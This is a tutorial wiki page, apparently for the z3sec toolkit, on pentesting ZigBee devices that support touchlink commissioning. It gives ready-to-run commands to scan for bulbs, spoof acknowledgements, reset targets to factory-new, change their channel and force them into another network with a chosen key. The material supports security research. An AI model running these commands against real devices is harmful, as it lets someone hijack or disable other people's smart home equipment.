Skip to content

Tutorial 1: Touchlink Attacks

IoTsec edited this page Jan 2, 2018 · 16 revisions

In the following, we present instructions to pentest ZigBee-certified devices that support touchlink commissioning.

We assume the usage of an USRP as radio transceiver. If you are using a KillerBee radio (e.g., connected to /dev/ttyUSB0), please substitute --sdr with --kb /dev/ttyUSB0.

Setup

First of all, connect the USRP to your host computer. To check if the USRP is connected correctly, run following command:

$ uhd_find_devices

The output should look like this:

--------------------------------------------------
-- UHD Device 0
--------------------------------------------------
Device Address:
    type: b200
    name: MyB200
    serial: 30DCE93
    product: B200

Scan for Bulbs in the Touchlink Range

Scan all ZigBee channels for touchlink-enabled devices:

z3sec_touchlink --sdr -c all scan

If you find a touchlink-enabled device, the output looks similar to the following:

Scan responses overview:
# |RSSI |channel |src_pan_id |src_addr                |
=======================================================
0 |0    |20      |0xe21      |00:17:88:01:10:4f:44:e8 |

Alternatively, you can scan just specific channels (e.g., channel 20) via:

z3sec_touchlink --sdr -c 20 scan

If you cannot find touchlink-enabled devices, try the following:

  • Check if the touchlink-enabled device is supplied with power
  • Move the radio transeiver closer (less than a meter) to the target
  • Experiment with different TX gain and antenna settings
  • Repeat the scan multiple times

Trigger the Identify Action

To trigger the identify action of the touchlink-enabled device with the extended address 00:17:88:01:10:4f:44:e8, please run following command:

z3sec_touchlink --sdr -c 20 identify --target 00:17:88:01:10:4f:44:e8 -d 15

This command scans for devices on channel 20, and if the specified target was found, triggers the identify action for 15 seconds.

ACK Spoofing

If the triggering of the identify action does not work, please follow ACK Spoofing instructions.

An exemplary command triggering the identify action of a touchlink-device on channel 20 for a duration of 15 seconds, while spoofing another ZigBee device that is within the wireless range:

z3sec_touchlink --sdr -c 20 --src_pan_id 0xABCD --src_addr_ext 00:17:88:01:00:ed:5c:30 identify --target 00:17:88:01:10:4f:44:e8 -d 15

This command spoofs another ZigBee device that does not necessarily supports touchlink commissioning. In our example, the spoofed device has the PAN ID 0xABCD and the extended address 00:17:88:01:00:ed:5c:30. Please note that the impersonated device needs to be within ZigBee range of the target device.

Reset Device to Factory-New

To reset a touchlink-enabled device to factory new, please run following command:

z3sec_touchlink --sdr -c 20 reset --target 00:17:88:01:10:4f:44:e8

This command scans for the target device on channel 20, and if it was found, resets the device to factory-new.

Afterwards, it is checkd if the reset was successful.

Change Channel

To change the channel of a touchlink-enabled device, use following command:

z3sec_touchlink --sdr -c 20 update --target 00:17:88:01:10:4f:44:e8 --channel_new 26

This command scans for the target device on channel 20, and if it was found, switches the channel of the device from 20 to 26.

Join to other network

Please note that this attack requires knowledge of the ZLL Master Key. Please provide this key in ~/.config/z3sec/touchlink_crypt.ini.

To join a touchlink-enabled device to another network, please run following command:

z3sec_touchlink --sdr -c 20 join --target 00:17:88:01:10:4f:44:e8 --channel_new 26 --addr_new 0x1234 --network_key A0A1A2A3A4A5A6A7A8A9AAABACADAEAF

This command scans for the target device on channel 20, and if it was found, joins the device (now referred to under address ´0x1234´) to the network with a random PAN ID on channel 26 and sets the network key to 0xA0A1A2A3A4A5A6A7A8A9AAABACADAEAF.

See Tutorial 2: Takeover Attack.